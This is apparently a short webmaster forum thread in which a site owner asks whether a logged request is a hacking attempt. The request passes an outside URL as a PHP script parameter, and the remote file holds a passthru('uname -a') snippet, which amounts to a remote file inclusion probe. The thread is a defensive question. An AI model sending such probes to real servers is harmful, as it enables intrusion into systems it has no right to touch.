Forum Moderators: coopster
[1] ww*w.foo.com/somefile.php?id=http://www.someurl.com
Normally, the url is htaccess overwritten to look like:
[2] ww*.foo.com/somethingelse-1.html
instead of
[3] ww*w.foo.com/somefile.php?id=1
visiting ww*w.someurl.com reveals the following code:
<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ;?>
Has someone been trying to hack my sevrer?
Your input is much appreciated.
Regards
was there a referer for the IP that requested that?
No, there wasn't a referer for this entry and when clicked on the url, an error message came up. (since there is no such record in my database matching the request.
however, I have no idea what is happening on the other end.